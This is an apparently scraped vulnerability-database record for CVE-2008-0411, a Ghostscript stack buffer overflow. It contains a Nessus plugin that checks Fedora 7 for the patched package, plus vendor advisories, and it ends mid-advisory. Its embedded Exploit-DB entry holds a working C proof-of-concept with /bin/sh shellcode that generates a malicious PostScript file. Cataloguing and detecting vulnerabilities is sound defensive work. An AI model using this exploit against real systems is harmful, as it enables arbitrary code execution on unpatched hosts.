ID FEDORA_2008-2084.NASL Type nessus Reporter This script is Copyright (C) 2008-2021 Tenable Network Security, Inc. Modified 2008-03-07T00:00:00
Description
This update contains a back-ported fix for a security issue that
allows malicious PostScript input files to cause a stack-based buffer
overflow (CVE-2008-0411).
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory 2008-2084.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(31365);
script_version("1.15");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/11");
script_cve_id("CVE-2008-0411");
script_xref(name:"FEDORA", value:"2008-2084");
script_name(english:"Fedora 7 : ghostscript-8.15.4-4.fc7 (2008-2084)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
script_set_attribute(
attribute:"description",
value:
"This update contains a back-ported fix for a security issue that
allows malicious PostScript input files to cause a stack-based buffer
overflow (CVE-2008-0411).
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bugzilla.redhat.com/show_bug.cgi?id=431536"
);
# https://lists.fedoraproject.org/pipermail/package-announce/2008-March/008546.html
script_set_attribute(
attribute:"see_also",
value:"http://www.nessus.org/u?a98967d1"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected ghostscript package."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_cwe_id(119);
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:ghostscript");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:7");
script_set_attribute(attribute:"patch_publication_date", value:"2008/03/06");
script_set_attribute(attribute:"plugin_publication_date", value:"2008/03/07");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
if (! ereg(pattern:"^7([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 7.x", "Fedora " + os_ver);
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
flag = 0;
if (rpm_check(release:"FC7", reference:"ghostscript-8.15.4-4.fc7")) flag++;
if (flag)
{
if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
else security_warning(0);
exit(0);
}
else
{
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ghostscript");
}
{"id": "FEDORA_2008-2084.NASL", "bulletinFamily": "scanner", "title": "Fedora 7 : ghostscript-8.15.4-4.fc7 (2008-2084)", "description": "This update contains a back-ported fix for a security issue that\nallows malicious PostScript input files to cause a stack-based buffer\noverflow (CVE-2008-0411).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "published": "2008-03-07T00:00:00", "modified": "2008-03-07T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/31365", "reporter": "This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=431536", "http://www.nessus.org/u?a98967d1"], "cvelist": ["CVE-2008-0411"], "type": "nessus", "lastseen": "2021-01-12T10:06:27", "edition": 23, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-0411"]}, {"type": "ubuntu", "idList": ["USN-599-1"]}, {"type": "centos", "idList": ["CESA-2008:0155"]}, {"type": "suse", "idList": ["SUSE-SA:2008:010"]}, {"type": "freebsd", "idList": ["CA8E56D5-E856-11DC-B5AF-0017319806E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:31309"]}, {"type": "slackware", "idList": ["SSA-2008-062-01"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:19291", "SECURITYVULNS:VULN:8726"]}, {"type": "gentoo", "idList": ["GLSA-200803-14"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1510-1:5BCC7"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0155"]}, {"type": "redhat", "idList": ["RHSA-2008:0155"]}, {"type": "fedora", "idList": ["FEDORA:M26GEHCP013573", "FEDORA:M23IOAG7007599"]}, {"type": "openvas", "idList": ["OPENVAS:60530", "OPENVAS:60522", "OPENVAS:1361412562310122605", "OPENVAS:136141256231060522", "OPENVAS:880260", "OPENVAS:880105", "OPENVAS:860606", "OPENVAS:830684", "OPENVAS:840317", "OPENVAS:870133"]}, {"type": "nessus", "idList": ["SUSE_GHOSTSCRIPT-FONTS-OTHER-4984.NASL", "CENTOS_RHSA-2008-0155.NASL", "SLACKWARE_SSA_2008-062-01.NASL", "MANDRIVA_MDVSA-2008-055.NASL", "UBUNTU_USN-599-1.NASL", "ORACLELINUX_ELSA-2008-0155.NASL", "FEDORA_2008-1998.NASL", "GENTOO_GLSA-200803-14.NASL", "SUSE_GHOSTSCRIPT-FONTS-OTHER-4985.NASL", "REDHAT-RHSA-2008-0155.NASL"]}], "modified": "2021-01-12T10:06:27", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-01-12T10:06:27", "rev": 2}, "vulnersScore": 6.6}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-2084.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(31365);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-0411\");\n script_xref(name:\"FEDORA\", value:\"2008-2084\");\n\n script_name(english:\"Fedora 7 : ghostscript-8.15.4-4.fc7 (2008-2084)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a back-ported fix for a security issue that\nallows malicious PostScript input files to cause a stack-based buffer\noverflow (CVE-2008-0411).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=431536\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-March/008546.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a98967d1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ghostscript package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:ghostscript\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"ghostscript-8.15.4-4.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ghostscript\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "31365", "cpe": ["cpe:/o:fedoraproject:fedora:7", "p-cpe:/a:fedoraproject:fedora:ghostscript"], "scheme": null}
{"cve": [{"lastseen": "2021-02-02T05:35:11", "description": "Stack-based buffer overflow in the zseticcspace function in zicc.c in Ghostscript 8.61 and earlier allows remote attackers to execute arbitrary code via a postscript (.ps) file containing a long Range array in a .seticcspace operator.", "edition": 6, "cvss3": {}, "published": "2008-02-28T21:44:00", "title": "CVE-2008-0411", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0411"], "modified": "2018-10-15T21:59:00", "cpe": ["cpe:/a:ghostscript:ghostscript:8.15", "cpe:/a:ghostscript:ghostscript:8.0.1", "cpe:/a:ghostscript:ghostscript:0", "cpe:/a:ghostscript:ghostscript:8.61"], "id": "CVE-2008-0411", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0411", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ghostscript:ghostscript:8.61:*:*:*:*:*:*:*", "cpe:2.3:a:ghostscript:ghostscript:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ghostscript:ghostscript:0:*:*:*:*:*:*:*", "cpe:2.3:a:ghostscript:ghostscript:8.15:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T00:28:12", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "Chris Evans discovered that Ghostscript contained a buffer overflow in \nits color space handling code. If a user or automated system were \ntricked into opening a crafted Postscript file, an attacker could cause \na denial of service or execute arbitrary code with privileges of the \nuser invoking the program. (CVE-2008-0411)", "edition": 5, "modified": "2008-04-09T00:00:00", "published": "2008-04-09T00:00:00", "id": "USN-599-1", "href": "https://ubuntu.com/security/notices/USN-599-1", "title": "Ghostscript vulnerability", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2020-07-17T03:28:29", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0155\n\n\nGhostscript is a program for displaying PostScript files, or printing them\r\nto non-PostScript printers.\r\n\r\nChris Evans from the Google Security Team reported a stack-based buffer\r\noverflow flaw in Ghostscript's zseticcspace() function. An attacker could\r\ncreate a malicious PostScript file that would cause Ghostscript to execute\r\narbitrary code when opened. (CVE-2008-0411)\r\n\r\nThese updated packages also fix a bug, which prevented the pxlmono printer\r\ndriver from producing valid output on Red Hat Enterprise Linux 4.\r\n\r\nAll users of ghostscript are advised to upgrade to these updated packages,\r\nwhich contain a backported patch to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026754.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026755.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026758.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026759.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026763.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026764.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026768.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-February/026769.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-March/026778.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-March/026779.html\n\n**Affected packages:**\nghostscript\nghostscript-devel\nghostscript-gtk\nhpijs\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0155.html", "edition": 6, "modified": "2008-03-03T19:13:15", "published": "2008-02-28T11:53:06", "href": "http://lists.centos.org/pipermail/centos-announce/2008-February/026754.html", "id": "CESA-2008:0155", "title": "ghostscript, hpijs security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T11:31:29", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "A stack based buffer overflow was fixed in the ghostscript interpreter, which can be used to execute code or at least crash ghostscript. (CVE-2008-0411)\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2008-02-28T18:04:20", "published": "2008-02-28T18:04:20", "id": "SUSE-SA:2008:010", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-02/msg00009.html", "type": "suse", "title": "remote code execution in ghostscript", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "\nChris Evans from the Google Security Team reports:\n\nSeverity: parsing of evil PostScript file will result in\n\t arbitrary code execution.\nA stack-based buffer overflow in the zseticcspace() function\n\t in zicc.c allows remote arbitrary code execution via a\n\t malicious PostScript file (.ps) that contains a long Range\n\t array.\n\n", "edition": 4, "modified": "2008-02-28T00:00:00", "published": "2008-02-28T00:00:00", "id": "CA8E56D5-E856-11DC-B5AF-0017319806E7", "href": "https://vuxml.freebsd.org/freebsd/ca8e56d5-e856-11dc-b5af-0017319806e7.html", "title": "ghostscript -- zseticcspace() function buffer overflow vulnerability", "type": "freebsd", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T14:20:55", "description": "Ghostscript 8.0.1/8.15 zseticcspace() Function Buffer Overflow Vulnerability. CVE-2008-0411. Remote exploit for linux platform", "published": "2008-02-27T00:00:00", "type": "exploitdb", "title": "Ghostscript 8.0.1/8.15 - zseticcspace Function Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-0411"], "modified": "2008-02-27T00:00:00", "id": "EDB-ID:31309", "href": "https://www.exploit-db.com/exploits/31309/", "sourceData": "source: http://www.securityfocus.com/bid/28017/info\r\n\r\nGhostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.\r\n\r\nSuccessfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions. \r\n\r\n/* A proof of concept exploit for ghostscript 8.61 and earlier.\r\n *\r\n * Vulnerability discovered by Chris Evans <cevans@google.com>\r\n * Author: wad@google.com (Will Drewry)\r\n *\r\n * Affects: All versions of ghostscript that support .seticcspace.\r\n * Tested on: Ubuntu gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 (x86)\r\n * Ghostscript 8.61 (2007-11-21) (x86)\r\n *\r\n * Discussion:\r\n *\r\n * The vulnerability is in the float vector handling in the seticcspace\r\n * function. zicc.c:seticcspace() allows the user to set the number of\r\n * expected float values (ncomps) in a vector (range_buff). However,\r\n * this vector is statically allocated with the maximum space of 8\r\n * floats. Despite this, the call (dict_floats_array_check_param) to\r\n * populate the array of floats is passed a maximum size of ncomps*2. A\r\n * large payload will result in overflowing this array. Since all the\r\n * values are read in as single precision floating point values, the\r\n * payload must be encoded as floats.\r\n *\r\n * This exploit encodes a basic metasploit-generated exec(/bin/sh) chunk\r\n * of shellcode as a list of floats and prepends the address to a \"jmp\r\n * *%esp\" in the /usr/bin/gs.\r\n *\r\n * This was tested on gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 package in\r\n * Ubuntu (on a 32-bit-only kernel) and versions up to 8.61\r\n * (2007-11-21) on other distributions.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nunsigned char shellcode[] =\r\n\"\\x6a\\x0b\\x58\\x99\\x52\\x66\\x68\\x2d\\x63\\x89\\xe7\\x68\\x2f\\x73\\x68\\x00\"\r\n\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\xe8\\x08\\x00\\x00\\x00\\x2f\\x62\\x69\"\r\n\"\\x6e\\x2f\\x73\\x68\\x00\\x57\\x53\\x89\\xe1\\xcd\\x80\";\r\nunsigned char sledpad[] = \"\\x90\\x90\\x90\"; // maximum sledpad needed\r\nunsigned char spacepad[] = \"\\x41\\x41\\x41\\x41\"; // indicator for fun dumps\r\n\r\nfloat bytes_to_float(unsigned char *bytes) {\r\n float f = 0.0f;\r\n memcpy((void *)&f, bytes, sizeof(float));\r\n return f;\r\n}\r\n\r\nunsigned char *build_attack(size_t *attack_size, long a, int padding) {\r\n size_t float_size = sizeof(float);\r\n size_t shellcode_size = sizeof(shellcode) - 1;\r\n size_t sledpad_size = float_size - (shellcode_size % float_size);\r\n size_t pad_size = padding * (sizeof(spacepad) - 1);\r\n unsigned char *attack = NULL, *padded_shellcode = shellcode;\r\n int i,j;\r\n\r\n // allocate attack space\r\n *attack_size = shellcode_size + sledpad_size + sizeof(a) + pad_size;\r\n if (*attack_size) attack = malloc(*attack_size);\r\n if (attack == NULL) exit(1);\r\n\r\n fprintf(stderr, \"sizeof(float) = %d\\n\", float_size);\r\n fprintf(stderr, \"sledpad_size = %d\\n\", sledpad_size);\r\n fprintf(stderr, \"pad_size = %d\\n\", pad_size);\r\n fprintf(stderr, \"attack_size = %d\\n\", *attack_size);\r\n fprintf(stderr, \"address = %p\\n\", a);\r\n\r\n // write out request space padding\r\n for (i = 0; i < pad_size; i += sizeof(spacepad)-1)\r\n memcpy(&attack[i], spacepad, sizeof(spacepad)-1);\r\n\r\n // write out the address to a \"jmp *%esp\"\r\n memcpy(&attack[i], (void *)&a, sizeof(long));\r\n i += sizeof(long);\r\n\r\n // pad to ensure that shellcode is divisible by sizeof(float)\r\n if (sledpad_size != float_size){\r\n // build a padded a shellcode\r\n padded_shellcode = malloc(shellcode_size+sledpad_size);\r\n if (padded_shellcode == NULL) exit(1);\r\n memcpy(padded_shellcode, sledpad, sledpad_size);\r\n memcpy(padded_shellcode+sledpad_size, shellcode, shellcode_size);\r\n shellcode_size += sledpad_size;\r\n }\r\n\r\n // Copy in the padded shellcode\r\n memcpy(&attack[i], padded_shellcode, shellcode_size);\r\n\r\n if (shellcode != padded_shellcode) free(padded_shellcode);\r\n // That's it.\r\n return attack;\r\n}\r\n\r\nint main(int argc, char **argv) {\r\n size_t i = 0;\r\n size_t attack_size = 0;\r\n unsigned char *attack = NULL;\r\n // location of jmp *esp in the binary\r\n long address = 0x0;\r\n\r\n\r\n if (argc != 3){\r\n fprintf(stderr, \"Usage: %s <pad count> <addr of jmp *%%esp>\\n\", argv[0]);\r\n fprintf(stderr, \" e.g. %s 15 $((0x8744eff))\\n\", argv[0]);\r\n fprintf(stderr, \"An address can be acquired with:\\n\");\r\n fprintf(stderr, \" objdump -D /usr/bin/gs | grep 'jmp[ \\\\t]\\\\+\\\\*%%esp'\\n\");\r\n return 1;\r\n }\r\n\r\n attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1]));\r\n\r\n // output the bad PS\r\n printf(\r\n \"%!PS-Adobe-2.0\\n\\n\"\r\n \"<< /DataSource currentfile /N 100 /Range [ \");\r\n // convert the attack to floats\r\n for(i = 0; i <= attack_size - sizeof(float); i += sizeof(float))\r\n printf(\"%.9g \", bytes_to_float(attack+i));\r\n printf(\" ] >> .seticcspace\\n\");\r\n\r\n free(attack);\r\n return 0;\r\n}\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/31309/"}], "slackware": [{"lastseen": "2020-10-25T16:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "New espgs or ghostscript packages are available for 11.0, 12.0, and -current\nto fix a buffer overflow.\n\nHere are the details from the Slackware 12.0 ChangeLog:\n\npatches/packages/espgs-8.15.4-i486-3_slack12.0.tgz:\n This patched version of ESP Ghostscript fixes a buffer overflow.\n For more information on the security issue, please see:\n http://scary.beasts.org/security/CESA-2008-001.html\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0411\n Thanks to Chris Evans and Will Drewry of Google Security for their work\n on discovering and demonstrating the overflow.\n(* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/espgs-8.15.3svn185-i486-3_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/espgs-8.15.4-i486-3_slack12.0.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/ap/ghostscript-8.62-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 11.0 package:\n3d0f77a4654adeb4ea078ffa421208f2 espgs-8.15.3svn185-i486-3_slack11.0.tgz\n\nSlackware 12.0 package:\n746589f38bb17ef543270c176e28759b espgs-8.15.4-i486-3_slack12.0.tgz\n\nSlackware -current package:\n36e98f8d699540a8ad93394269235afe ghostscript-8.62-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg espgs-8.15.4-i486-3_slack12.0.tgz", "modified": "2008-03-02T10:01:48", "published": "2008-03-02T10:01:48", "id": "SSA-2008-062-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.370633", "type": "slackware", "title": "[slackware-security] espgs/ghostscript", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:21", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": " [ 7.05-32.1.13]\n - Applied patch to fix CVE-2008-0411 (bug #433366). ", "edition": 4, "modified": "2008-02-28T00:00:00", "published": "2008-02-28T00:00:00", "id": "ELSA-2008-0155", "href": "http://linux.oracle.com/errata/ELSA-2008-0155.html", "title": "Important: ghostscript security update ", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "Ghostscript is a program for displaying PostScript files, or printing them\r\nto non-PostScript printers.\r\n\r\nChris Evans from the Google Security Team reported a stack-based buffer\r\noverflow flaw in Ghostscript's zseticcspace() function. An attacker could\r\ncreate a malicious PostScript file that would cause Ghostscript to execute\r\narbitrary code when opened. (CVE-2008-0411)\r\n\r\nThese updated packages also fix a bug, which prevented the pxlmono printer\r\ndriver from producing valid output on Red Hat Enterprise Linux 4.\r\n\r\nAll users of ghostscript are advised to upgrade to these updated packages,\r\nwhich contain a backported patch to resolve these issues.", "modified": "2017-09-08T12:06:43", "published": "2008-02-27T05:00:00", "id": "RHSA-2008:0155", "href": "https://access.redhat.com/errata/RHSA-2008:0155", "type": "redhat", "title": "(RHSA-2008:0155) Important: ghostscript security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "Ghostscript is a set of software that provides a PostScript(TM) interpreter, a set of C procedures (the Ghostscript library, which implements the graphics capabilities in the PostScript language) and an interpreter for Portable Document Format (PDF) files. Ghostscript translates PostScript code into many common, bitmapped formats, like those understood by your printer or screen. Ghostscript is normally used to display PostScript files and to print PostScript files to non-PostScript printers. If you need to display PostScript files or print them to non-PostScript printers, you should install ghostscript. If you install ghostscript, you also need to install the ghostscript-fonts package. ", "modified": "2008-03-06T16:39:31", "published": "2008-03-06T16:39:31", "id": "FEDORA:M26GEHCP013573", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: ghostscript-8.15.4-4.fc7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0411"], "description": "Ghostscript is a set of software that provides a PostScript(TM) interpreter, a set of C procedures (the Ghostscript library, which implements the graphics capabilities in the PostScript language) and an interpreter for Portable Document Format (PDF) files. Ghostscript translates PostScript code into many common, bitmapped formats, like those understood by your printer or screen. Ghostscript is normally used to display PostScript files and to print PostScript files to non-PostScript printers. If you need to display PostScript files or print them to non-PostScript printers, you should install ghostscript. If you install ghostscript, you also need to install the ghostscript-fonts package. ", "modified": "2008-03-03T18:24:29", "published": "2008-03-03T18:24:29", "id": "FEDORA:M23IOAG7007599", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: ghostscript-8.61-8.fc8", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "cvelist": ["CVE-2008-0411"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1510-1 security@debian.org\r\nhttp://www.debian.org/security/ Thijs Kinkhorst\r\nFebruary 27, 2008 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : gs-esp / gs-gpl\r\nVulnerability : buffer overflow\r\nProblem type : local\r\nDebian-specific: no\r\nCVE Id(s) : CVE-2008-0411\r\n\r\nChris Evans discovered a buffer overflow in the color space handling\r\ncode of the Ghostscript PostScript/PDF interpreter, which might result\r\nin the execution of arbitrary code if a user is tricked into processing\r\na malformed file.\r\n\r\nFor the stable distribution (etch), this problem has been fixed in version\r\n8.54.dfsg.1-5etch1 of gs-gpl and 8.15.3.dfsg.1-1etch1 of gs-esp.\r\n\r\nFor the old stable distribution (sarge), this problem has been fixed in\r\nversion 8.01-6 of gs-gpl and 